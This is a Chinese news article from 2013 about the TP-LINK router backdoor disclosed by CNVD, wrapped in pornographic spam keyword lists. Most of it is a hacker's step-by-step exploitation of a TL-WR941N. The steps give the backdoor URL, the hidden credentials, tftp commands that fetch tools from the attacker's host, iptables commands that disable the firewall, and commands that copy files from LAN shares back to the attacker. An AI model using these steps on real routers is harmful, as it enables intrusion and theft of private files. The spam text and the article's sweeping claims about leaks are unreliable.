91亚洲国产成人aⅴ毛片大全,本道无码一区二区久久激情,久久久综合九色合综国产,亚洲阿v天堂2018在线观看,综合色天天久久,国产精品国产三级在线高清观看,国产精品大屁股1区二区三区,亚洲三级香港三级久久,亚洲国产精品500在线观看,野外三级国产在线观看

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        來源:千龍網(wǎng)
        2013-04-12 10:04:00
        分享

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        近期,“TP-LINK漏洞門”事件被CNVD( 國(guó)家信息安全漏洞共享平臺(tái) )曝光后,在社會(huì)上引起了極大的關(guān)注。由于TP-LINK的市場(chǎng)占有率達(dá)到70%,很多網(wǎng)友擔(dān)心自己的信息是否被泄露。

        據(jù)一位資深黑客介紹,TP-LINK路由器的后門漏洞危險(xiǎn)程度遠(yuǎn)遠(yuǎn)大于目前披露的程度。他解釋,在攻擊漏洞的TP-LINK路由器時(shí),并非一定要在本地連接路由器,而是可以通過遠(yuǎn)程進(jìn)入TP-LINK路由器,從而監(jiān)控網(wǎng)友的所有上網(wǎng)行為,并且能夠竊取本地信息。也就是說,控制了用戶的TP-LINK路由器之后,也就可以監(jiān)控用戶的上網(wǎng)行為,隨意從網(wǎng)友的電腦里竊取一切信息,不管是隱私信息還是重要資料都可以信手拈來,而用戶根本不知道。

        他做了一個(gè)演示,利用TP-LINK存在的后門漏洞,輕松的監(jiān)控用戶的上網(wǎng)行為,用戶在QQ里面聊了什么,在淘寶上面買了什么東西,他都能夠一目了然,在他的眼里看來,用戶就是一個(gè)完全透明的人。而且,他還可以利用TP-LINK的漏洞進(jìn)入用戶的電腦,不管用戶是在歐洲拍的婚紗照,還是在家里和愛人拍的隱私照,只要他想盜取隨時(shí)都可以,完全沒有隱私可言。

        他還介紹,TP-LINK的后門漏洞存在多年,一直都沒有被TP-LINK重視,而TP-LINK的市場(chǎng)占有率達(dá)到70%以上。所以,很多隱私泄露都與TP-LINK有關(guān),不然黑客怎么可能獲得用戶的隱私照片和銀行賬號(hào),很多都是利用TP-LINK的漏洞完成的,只是用戶根本不知道而已。國(guó)內(nèi)用水星和迅捷的用戶也難免厄運(yùn),因?yàn)樗呛脱附荻际荰P-LINK的馬甲,只要能夠找到TP-LINK路由器的漏洞,就能隨意進(jìn)入水星和迅捷路由器用戶的電腦。就目前來說,TP-LINK的路由器大多存在問題,要想保證絕對(duì)安全幾乎不大可能。

        以下是黑客利用TP-LINK路由器后門漏洞盜取用戶信息的演示:

          一、環(huán)境拓?fù)鋱D

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖1 環(huán)境拓?fù)鋱D

        拓?fù)鋱D說明:

        1、PC2 使用公網(wǎng)IP,或者是連接公網(wǎng)的路由器下的DMZ設(shè)備 ;

        2、TP-Link開啟遠(yuǎn)程WEB訪問,示例中的8011為遠(yuǎn)程WEB訪問端口 ;

        3、PC2要開啟TFTP服務(wù)器 ;

        4、TP-Link設(shè)備型號(hào):TL-WR941N,實(shí)物圖請(qǐng)見附錄 。

        二、操作步驟

        1、在TP-Link設(shè)備聯(lián)網(wǎng)情況下開啟遠(yuǎn)程WEB訪問,如圖2、圖3

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        2、PC2設(shè)備在聯(lián)網(wǎng)情況下,在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/start_art.html (xxx.xxx.xxx.xxx為TP-Link設(shè)備的WAN口IP,8011為遠(yuǎn)程WEB訪問的端口號(hào)),等待1分鐘左右出現(xiàn)如下頁面,如圖4所示

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖4

        3、PC2在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/linux_cmdline.html ,出現(xiàn)TP-LINK設(shè)備的登錄頁面,輸入設(shè)備管理的用戶名和密碼(用戶名:admin,密碼:admin),進(jìn)入以下頁面(如圖5所示),這個(gè)頁面需要的用戶名是:osteam,密碼是:5up。在這個(gè)頁面我們就可以大展拳腳了。接下來我們就利用漏洞來訪問TP-link局域網(wǎng)下的共享

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖5

        4、PC2開啟tftp服務(wù)器,并在tftp服務(wù)器路徑下放置 busybox / libbigballofmud.so / smbclient / smbtree 文件(后面會(huì)將這幾個(gè)文件通過tftp導(dǎo)入到TP-Link設(shè)備的/tmp目錄下)。在設(shè)備頁面的指令欄輸入 tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa為PC2的公網(wǎng)IP地址)。出現(xiàn)如下頁面(圖6)

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        7、在指令欄輸入 iptables -P INPUT ACCEPT / iptables -P FORWARD ACCEPT / iptables –F ,如圖9。這幾條命令是改變防火墻的過濾規(guī)則,操作后,該設(shè)備的防火墻就形同虛設(shè)了。

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        10、在telnet窗口輸入cd /tmp,進(jìn)入該目錄后先后輸入 tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/ tftp -g -r smbclient aaa.aaa.aaa.aaa/ tftp -g -r smbtree aaa.aaa.aaa.aaa(這幾個(gè)命令是將libbigballofmud.so/smbtree/smbclient通過TFTP導(dǎo)入到TP-Link的/tmp目錄下,所以要確保PC2開啟TFTP服務(wù)器)。如圖12所示,已成功導(dǎo)入

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖12

        11、在telnet界面輸入以下命令(如圖13所示)

        mount tmpfs /usr -t tmpfs

        /tmp/busybox mkdir -p /usr/lib

        /tmp/busybox cp /tmp/*so* /usr/lib/ -fr

        /tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0

        chmod 777 smbtree

        chmod 777 smbclient

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖13

        12、在/tmp目錄下執(zhí)行./smbtree命令,即可搜索到該局域網(wǎng)下的共享文件信息,圖14

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖14

        13、執(zhí)行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb為圖14搜索到的一個(gè)共享文件目錄),密碼為空,進(jìn)入文件夾后執(zhí)行l(wèi)s,顯示該文件夾下的文件類容,如圖15

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖15

        14、通過索引目錄,可以查詢到每一個(gè)目錄下的文件信息,如/mnt/files/cherryblossoms1.jpg。如圖16所示。接下來我們就看看cherryblossoms1.jpg是一個(gè)什么圖片。

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖16

        15、將共享文件拷貝到TP-Link設(shè)備上的/tmp目錄下,執(zhí)行命令get ccc(ccc為要拷貝的共享文件,如圖17中的cherryblossoms1.jpg)

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖17

        16、將文件通過tftp拷貝到本地設(shè)備上,執(zhí)行命令 /tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。如圖18所示

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖20

        注意事項(xiàng):

        1、TP-Link設(shè)備需要開啟遠(yuǎn)程WEB訪問,示例中的8011為遠(yuǎn)程WEB訪問的端口

        2、本地設(shè)備最好使用公網(wǎng)IP,或者是連接公網(wǎng)的路由器下的DMZ設(shè)備

        3、本地設(shè)備要開啟TFTP服務(wù)器

        4、 busybox / libbigballofmud.so / smbclient / smbtree 需要拷貝在TP-Link下的/tmp目錄下

        5、示例中的xxx.xxx.xxx.xxx為TP-link設(shè)備WAN口IP,aaa.aaa.aaa.aaa為PC2的公網(wǎng)IP,/ /bbbb/bbbbbb為搜索到的一個(gè)共享目錄,ccc為共享目錄下的一個(gè)共享文件

        6、需要用到的工具有: tftpd32.exe 、 busybox 、 libbigballofmud.so 、 smbclient 、 smbtree

        附錄: TL-WR941N 實(shí)物圖

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        圖21

        TP-LINK成隱私泄露最大渠道 70%用戶或受害

        分享
        標(biāo)簽:

        推薦

        99热爱久久99热爱九九热爱| 国产99久久久国产精品免费| av免费网站免费久久网| 免费a级毛片在线播放不收费| 亚洲av永久无码国产精品久久| 国产一级毛片AV不卡尤物| 日本五十路熟女在线视频| 91精品久久久老熟女91精品| 丰满少妇高潮惨叫久久久一| 少妇内射视频播放舔大片| 五月天婷婷一区二区三区久久| 中文字幕日韩高清乱码| 男女猛烈拍拍拍无挡视频| 亚洲av无码一区二区三区网站| 久久久久久岛国免费网站| 亚洲国产国语对白在线观看| 久久精品国产精品亚洲| 久久亚洲精品ab无码播放| 亚洲日韩成人无码不卡网站| 在线观看一区二区蜜桃| 国产成人精品999视频| 亚洲最大中文字幕无码网站| 久久91精品国产91久久麻豆| 亚洲国产精品久久无人区| 久久精品人妻无码一区二区三区| 亚洲影院丰满少妇中文字幕无码| 精品人妻一区二区三区av| 日本一区二区三区视频网站| a级国产乱理伦片在线播放| 国产在线不卡免费播放| 亚洲成人av在线播放不卡| 国产精品区一区二区三在线播放| 欧美成人一区二区三区在线观看| 亚洲午夜无码久久久久软件| 精品国产中文字幕久久久| 中国丰满熟妇xxxx性| 欧美成人www免费全部网站| 五十路在线中文字幕在线中文字幕| 欧美性生交活xxxxxdddd| 国产亚洲精品第一综合麻豆| 男女上床视频免费网站|